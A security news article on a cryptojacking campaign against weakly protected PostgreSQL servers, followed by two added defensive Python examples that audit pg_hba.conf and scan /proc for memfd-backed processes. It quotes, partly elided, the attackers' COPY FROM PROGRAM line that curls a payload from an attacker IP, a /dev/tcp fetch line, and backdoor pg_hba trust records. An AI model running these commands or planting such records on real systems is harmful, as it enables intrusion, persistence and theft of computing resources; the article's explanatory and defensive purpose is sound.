A large cryptojacking campaign is targeting poorly secured PostgreSQL database servers and has affected more than 1,500 organizations worldwide. The operation pairs credential brute-forcing with fileless execution to deploy Monero (XMR)-mining malware, and it has slipped past conventional cloud workload protection platform (CWPP) tooling.
Wiz researchers attribute the campaign to the threat actor tracked as JINX-0126, which has refined its tooling since Aqua Security first documented the activity in 2024. The attackers target PostgreSQL instances that are reachable from the internet and protected only by weak or default credentials; roughly 30% of cloud-hosted PostgreSQL servers are in that state.
Once authenticated, the attackers use PostgreSQL's COPY ... FROM PROGRAM command, which runs a shell command as the database server's operating-system user and is available to superusers and members of the pg_execute_server_program role. Code execution therefore starts from a SQL statement rather than from a file written to disk, which is why file-write-based detection sees nothing. This primitive bootstraps a multi-stage payload chain that includes UPX-packed Go binaries named to look like legitimate PostgreSQL processes.
Wiz Threat Research analysts identified three cryptocurrency wallets tied to the campaign, each with around 550 active mining workers according to C3Pool telemetry. At its peak the operation reached a hashrate of 4.04 GH/s, roughly €10.40 per hour in XMR at the exchange rate current when the research was published.
While the primary motive appears to be financial gain, the attack’s fileless nature and the resulting system reconfigurations create persistent backdoors, potentially paving the way for future ransomware attacks or data exfiltration.
Infection Mechanism and Defense Evasion
The attack begins with credential spraying against PostgreSQL's default postgres account and other common usernames. After a successful login the attacker issues a COPY ... FROM PROGRAM statement that fetches the first-stage payload:
COPY FROM PROGRAM 'kill -9 $(pgrep zsvc) [...] curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core'
The command first kills competing cryptominers (zsvc is visible above; the elided portion also targets kinsing and kdevtmpfsi) and then downloads the pg_core binary. A later-stage payload, cpu_hu, is never written to disk: it is loaded into an anonymous file created with memfd_create() and executed from there, so the usual disk artifacts are largely absent:
exec 5<>/dev/tcp/159.223.123.175/36287 [...] cat) postmaster
For persistence the malware edits PostgreSQL's pg_hba.conf. The first record below rejects the pgg_superadmins role from any client address; the second lets any user connect from the whole 127.0.0.0/8 loopback range with the trust method, that is, without a password. Because pg_hba.conf is evaluated top to bottom and the first matching record decides the outcome, the position of these two lines relative to the existing records determines which connections they affect:
host all pgg_superadmins all reject
host all all 127.0.0.1/8 trust
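To see what those two records do once they are in place, the following added example (not code from the article or from Wiz) parses a pg_hba.conf and evaluates connections with PostgreSQL's first-match rule. The two sample files are constructed: a distribution-style baseline, and the same file with the attacker's lines inserted at the top. Only the subset of pg_hba syntax needed here is handled; role-membership prefixes ('+group'), separate netmask columns, 'samehost'/'samenet' and per-record auth options are rejected with ValueError, and hostssl/hostnossl are treated like plain host because SSL state is not modelled.

```python
"""Evaluate pg_hba.conf records the way PostgreSQL does: top to bottom,
first match wins. Added example, not from the article or the advisory."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Rule:
    conn_type: str            # local, host, hostssl, hostnossl
    databases: List[str]
    users: List[str]
    network: Optional[object]  # IPv4Network/IPv6Network; None = any address (or local)
    method: str
    lineno: int


def parse_pg_hba(text: str) -> List[Rule]:
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) == 4:
            dbs, users, method, network = f[1], f[2], f[3], None
        elif f[0] in ("host", "hostssl", "hostnossl") and len(f) == 5:
            dbs, users, addr, method = f[1], f[2], f[3], f[4]
            # 'all' in the ADDRESS column matches any client IP. PostgreSQL accepts
            # 127.0.0.1/8 and treats it as the whole 127.0.0.0/8 range (strict=False).
            network = None if addr == "all" else ipaddress.ip_network(addr, strict=False)
        else:
            raise ValueError("unsupported pg_hba record at line %d: %s" % (lineno, raw))
        rules.append(Rule(f[0], dbs.split(","), users.split(","), network, method, lineno))
    return rules


def _name_matches(patterns: List[str], name: str) -> bool:
    return "all" in patterns or name in patterns


def evaluate(rules: List[Rule], conn_type: str, database: str, user: str,
             address: Optional[str] = None) -> Tuple[str, Optional[int]]:
    """Return (auth method, line number) of the first matching record.
    No match means PostgreSQL refuses the connection outright."""
    addr = ipaddress.ip_address(address) if address is not None else None
    for r in rules:
        if r.conn_type == "local":
            if conn_type != "local":
                continue
        else:
            if conn_type == "local" or addr is None:
                continue
            if r.network is not None and addr not in r.network:
                continue
        if _name_matches(r.databases, database) and _name_matches(r.users, user):
            return r.method, r.lineno
    return "no match (connection refused)", None


def audit(rules: List[Rule]) -> List[Tuple[int, str]]:
    """Records a reviewer should look at: passwordless 'trust' and any 'reject'."""
    findings = []
    for r in rules:
        if r.conn_type == "local":
            where = "local socket"
        else:
            where = "any address" if r.network is None else str(r.network)
        who = ",".join(r.users)
        if r.method == "trust":
            findings.append((r.lineno, "trust: users %s from %s need no password" % (who, where)))
        elif r.method == "reject":
            findings.append((r.lineno, "reject: users %s from %s are locked out" % (who, where)))
    return findings


# Constructed baseline resembling a distribution default.
BASELINE_PG_HBA = """\
local   all   all                           peer
host    all   all              127.0.0.1/32  scram-sha-256
host    all   all              10.0.0.0/8    scram-sha-256
"""

# The same file with the two records quoted above inserted at the top,
# where they are consulted before every existing record.
TAMPERED_PG_HBA = """\
host    all   pgg_superadmins  all           reject
host    all   all              127.0.0.1/8   trust
""" + BASELINE_PG_HBA

if __name__ == "__main__":
    bad = parse_pg_hba(TAMPERED_PG_HBA)
    print(evaluate(bad, "host", "postgres", "postgres", "127.9.8.7"))
    for lineno, msg in audit(bad):
        print("line %d: %s" % (lineno, msg))
```

Run against a real server, point parse_pg_hba at the file named by `SHOW hba_file` and compare the audit output with the server's own view in the pg_hba_file_rules view; any trust record for a TCP range, and any reject record you did not write, is worth a closer look.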
At the same time it installs cron jobs that re-launch the miner every minute and creates a privileged role, psql_sys, with CREATE ROLE. Each binary carries its own configuration blob encrypted with AES-256, so every victim receives a payload with a distinct hash and hash- or signature-based detection does not match across victims.
The campaign exposes a common gap in cloud security: 90% of environments host PostgreSQL instances, and many of them lack adequate access controls. Wiz recommends network-level restrictions on database ports, a credential audit, and runtime monitoring for memfd-backed execution, which the advisory calls out as a key indicator of compromise.
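The memfd execution described in the infection section and the runtime-monitoring recommendation above both come down to one check on a Linux host: a running process whose executable has no path on disk. The following added example (not Wiz's detection logic) performs that check over a snapshot of /proc. The Proc record format, the POSTGRES_BIN_DIRS list and the sample snapshot are constructed assumptions; adjust the directories to the installation being monitored.

```python
"""Find processes whose executable exists only in memory (memfd) or that
borrow a PostgreSQL process name while running from somewhere else.
Added example; the Proc format, bin dirs and snapshot are constructed."""
import os
from dataclasses import dataclass
from typing import Dict, List

# Assumption: where legitimate PostgreSQL binaries live on this host.
POSTGRES_BIN_DIRS = ("/usr/lib/postgresql/", "/usr/pgsql-", "/usr/local/pgsql/bin/")
POSTGRES_NAMES = {"postgres", "postmaster"}


@dataclass
class Proc:
    pid: int
    comm: str      # /proc/PID/comm (the kernel's task name)
    exe: str       # os.readlink('/proc/PID/exe')
    cmdline: str   # /proc/PID/cmdline with NULs replaced by spaces


def classify(p: Proc) -> List[str]:
    """Return findings for one process; an empty list means nothing odd."""
    findings = []
    # A binary created with memfd_create() and executed through execveat()/fexecve()
    # or /proc/self/fd/N has no path on disk; the kernel reports the exe link as
    # '/memfd:<name> (deleted)'.
    if p.exe.startswith("/memfd:"):
        findings.append("memfd-backed executable")
    # A dropper that unlinks its file after exec leaves a dangling exe link instead.
    elif p.exe.endswith(" (deleted)"):
        findings.append("executable unlinked from disk")
    # PostgreSQL process name, but the binary is not where PostgreSQL is installed.
    if p.comm in POSTGRES_NAMES and not p.exe.startswith(POSTGRES_BIN_DIRS):
        findings.append("PostgreSQL process name outside known install path")
    return findings


def scan(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> findings for every process that has at least one finding."""
    result = {}
    for p in procs:
        f = classify(p)
        if f:
            result[p.pid] = f
    return result


def collect_live() -> List[Proc]:
    """Snapshot /proc on a Linux host (root is needed to read other users' exe links)."""
    procs = []
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            exe = os.readlink("/proc/%s/exe" % pid)
            with open("/proc/%s/comm" % pid) as fh:
                comm = fh.read().strip()
            with open("/proc/%s/cmdline" % pid, "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            continue  # process exited, kernel thread, or not ours to inspect
        procs.append(Proc(int(pid), comm, exe, cmdline))
    return procs


# Constructed snapshot, not real telemetry: init, two genuine PostgreSQL
# processes, and three that mimic the behaviour described in the article.
SAMPLE_SNAPSHOT = [
    Proc(1, "systemd", "/usr/lib/systemd/systemd", "/sbin/init"),
    Proc(812, "postgres", "/usr/lib/postgresql/16/bin/postgres",
         "/usr/lib/postgresql/16/bin/postgres -D /var/lib/postgresql/16/main"),
    Proc(813, "postgres", "/usr/lib/postgresql/16/bin/postgres", "postgres: checkpointer"),
    Proc(2201, "postmaster", "/memfd:postmaster (deleted)", "postmaster"),
    Proc(2240, "cpu_hu", "/memfd: (deleted)", "postgres: walwriter"),
    Proc(2305, "pg_core", "/var/lib/postgresql/pg_core (deleted)", "./pg_core"),
]

if __name__ == "__main__":
    for pid, findings in sorted(scan(SAMPLE_SNAPSHOT).items()):
        print(pid, "; ".join(findings))
```

The "(deleted)" branch is noisy right after a package upgrade, because every long-running daemon whose binary was replaced on disk shows the same dangling link; the memfd branch is not, and a memfd-backed child of the postgres server process, combined with a new cron entry or an unexpected superuser role, is the combination the advisory describes.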
As opportunistic attacks increasingly target databases, organizations must prioritize configuration hygiene and adopt behavioral threat detection strategies to safeguard their systems.